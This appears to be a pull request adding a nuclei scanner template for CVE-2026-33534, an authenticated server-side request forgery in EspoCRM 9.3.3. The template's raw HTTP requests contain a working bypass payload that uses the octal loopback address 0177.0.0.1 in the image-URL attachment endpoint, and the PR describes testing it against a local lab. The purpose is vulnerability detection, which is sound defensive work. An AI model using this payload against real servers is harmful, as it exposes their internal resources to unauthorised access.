### PR TITLE
Add EspoCRM CVE-2026-33534 template

### DIFF
--- a/http/cves/2026/CVE-2026-33534.yaml
+++ b/http/cves/2026/CVE-2026-33534.yaml
@@ -1,7 +1,7 @@
 id: CVE-2026-33534
 
 info:
-  name: EspoCRM - Server-Side Request Forgery
+  name: EspoCRM <= 9.3.3 - Server-Side Request Forgery
   author: EntroVyx
   severity: medium
   description: |
@@ -34,7 +34,6 @@ http:
         Host: {{Hostname}}
         Authorization: Basic {{base64(username + ':' + password)}}
         Content-Type: application/json
-        Accept: application/json
 
         {"url":"http://127.0.0.1:80/client/img/logo-light.svg","field":"avatar","parentType":"User"}
 
@@ -50,13 +49,13 @@ http:
         Host: {{Hostname}}
         Authorization: Basic {{base64(username + ':' + password)}}
         Content-Type: application/json
-        Accept: application/json
 
         {"url":"http://0177.0.0.1:80/client/img/logo-light.svg","field":"avatar","parentType":"User"}
 
     matchers:
       - type: dsl
         dsl:
-          - 'status_code == 200'
           - 'contains_all(body, "\"id\"", "\"field\":\"avatar\"", "\"parentType\":\"User\"", "0177.0.0.1")'
+          - 'contains(content_type, "application/json")'
+          - 'status_code == 200'
         condition: and

--- a/http/cves/2026/CVE-2026-33534.yaml
+++ b/http/cves/2026/CVE-2026-33534.yaml
@@ -1,0 +1,56 @@
+id: CVE-2026-33534
+
+info:
+  name: EspoCRM 9.3.3 - Authenticated SSRF via Alternative IPv4 Notation
+  author: EntroVyx
+  severity: medium
+  description: |
+    EspoCRM 9.3.3 allows an authenticated user to bypass internal-host validation by using alternative IPv4 notation such as 0177.0.0.1 in the /api/v1/Attachment/fromImageUrl flow. The direct loopback request is blocked, while the alternative notation is normalized by cURL and fetched server-side.
+  impact: |
+    An authenticated attacker can force the EspoCRM server to request loopback-only or otherwise internal resources and store the fetched response as an attachment.
+  remediation: |
+    Upgrade EspoCRM to 9.3.4 or later.
+  reference:
+    - https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 4.3
+    cve-id: CVE-2026-33534
+    cwe-id: CWE-918
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: espocrm
+    product: espocrm
+  tags: cve,cve2026,espocrm,ssrf,authenticated,intrusive
+
+variables:
+  internal_port: "80"
+  internal_path: "/client/img/logo-light.svg"
+
+http:
+  - raw:
+      - |
+        POST /api/v1/Attachment/fromImageUrl HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Basic {{base64(username + ':' + password)}}
+        Content-Type: application/json
+        Accept: application/json
+
+        {"url":"http://127.0.0.1:{{internal_port}}{{internal_path}}","field":"avatar","parentType":"User"}
+
+      - |
+        POST /api/v1/Attachment/fromImageUrl HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Basic {{base64(username + ':' + password)}}
+        Content-Type: application/json
+        Accept: application/json
+
+        {"url":"http://0177.0.0.1:{{internal_port}}{{internal_path}}","field":"avatar","parentType":"User"}
+
+    cookie-reuse: true
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_1 == 403 && status_code_2 == 200 && contains(body_2, "\"id\"") && contains(body_2, "\"field\":\"avatar\"") && contains(body_2, "\"parentType\":\"User\"") && contains(body_2, "0177.0.0.1")'

--- a/http/cves/2026/CVE-2026-33534.yaml
+++ b/http/cves/2026/CVE-2026-33534.yaml
@@ -1,17 +1,18 @@
 id: CVE-2026-33534
 
 info:
-  name: EspoCRM 9.3.3 - Authenticated SSRF via Alternative IPv4 Notation
+  name: EspoCRM - Server-Side Request Forgery
   author: EntroVyx
   severity: medium
   description: |
-    EspoCRM 9.3.3 allows an authenticated user to bypass internal-host validation by using alternative IPv4 notation such as 0177.0.0.1 in the /api/v1/Attachment/fromImageUrl flow. The direct loopback request is blocked, while the alternative notation is normalized by cURL and fetched server-side.
+    EspoCRM <= 9.3.3 contains an authenticated server-side request forgery caused by improper internal-host validation using alternative IPv4 formats in HostCheck::isNotInternalHost(), letting authenticated users access internal resources via /api/v1/Attachment/fromImageUrl endpoint.
   impact: |
-    An authenticated attacker can force the EspoCRM server to request loopback-only or otherwise internal resources and store the fetched response as an attachment.
+    Authenticated attackers can access internal network resources, potentially exposing sensitive data or internal services.
   remediation: |
-    Upgrade EspoCRM to 9.3.4 or later.
+    Upgrade to version 9.3.4 or later.
   reference:
     - https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-33534
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 4.3
@@ -24,9 +25,7 @@ info:
     product: espocrm
   tags: cve,cve2026,espocrm,ssrf,authenticated,intrusive
 
-variables:
-  internal_port: "80"
-  internal_path: "/client/img/logo-light.svg"
+flow: http(1) && http(2)
 
 http:
   - raw:
@@ -37,8 +36,15 @@ http:
         Content-Type: application/json
         Accept: application/json
 
-        {"url":"http://127.0.0.1:{{internal_port}}{{internal_path}}","field":"avatar","parentType":"User"}
+        {"url":"http://127.0.0.1:80/client/img/logo-light.svg","field":"avatar","parentType":"User"}
 
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 403'
+        internal: true
+
+  - raw:
       - |
         POST /api/v1/Attachment/fromImageUrl HTTP/1.1
         Host: {{Hostname}}
@@ -46,11 +52,11 @@ http:
         Content-Type: application/json
         Accept: application/json
 
-        {"url":"http://0177.0.0.1:{{internal_port}}{{internal_path}}","field":"avatar","parentType":"User"}
+        {"url":"http://0177.0.0.1:80/client/img/logo-light.svg","field":"avatar","parentType":"User"}
 
-    cookie-reuse: true
-    req-condition: true
     matchers:
       - type: dsl
         dsl:
-          - 'status_code_1 == 403 && status_code_2 == 200 && contains(body_2, "\"id\"") && contains(body_2, "\"field\":\"avatar\"") && contains(body_2, "\"parentType\":\"User\"") && contains(body_2, "0177.0.0.1")'
+          - 'status_code == 200'
+          - 'contains_all(body, "\"id\"", "\"field\":\"avatar\"", "\"parentType\":\"User\"", "0177.0.0.1")'
+        condition: and


### PR DESCRIPTION
## Template / CVE

Adds a nuclei template for EspoCRM CVE-2026-33534, an authenticated SSRF in EspoCRM 9.3.3 via alternative IPv4 notation in `/api/v1/Attachment/fromImageUrl`.

## References

- https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73

## Validation

Validated template syntax with nuclei v3.8.0:

```bash
nuclei -validate -t http/cves/2026/CVE-2026-33534.yaml
```

Validated against a local EspoCRM 9.3.3 lab:

```bash
nuclei \
  -u http://127.0.0.1:8083 \
  -t http/cves/2026/CVE-2026-33534.yaml \
  -V username=admin \
  -V password='REDACTED' \
  -V internal_port=8083 \
  -silent -nc -timeout 10 -retries 0
```

Expected vulnerable behavior observed:

- Direct loopback URL `http://127.0.0.1:8083/client/img/logo-light.svg` returned HTTP 403.
- Alternative loopback URL `http://0177.0.0.1:8083/client/img/logo-light.svg` returned HTTP 200 and stored an attachment.
